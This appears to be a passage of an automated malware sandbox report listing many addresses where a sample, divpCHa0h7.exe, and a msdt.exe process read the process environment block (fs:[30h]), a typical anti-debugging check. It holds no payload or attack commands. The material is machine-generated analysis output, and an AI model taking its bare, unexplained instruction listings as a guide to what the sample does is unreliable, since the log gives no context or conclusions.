          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]
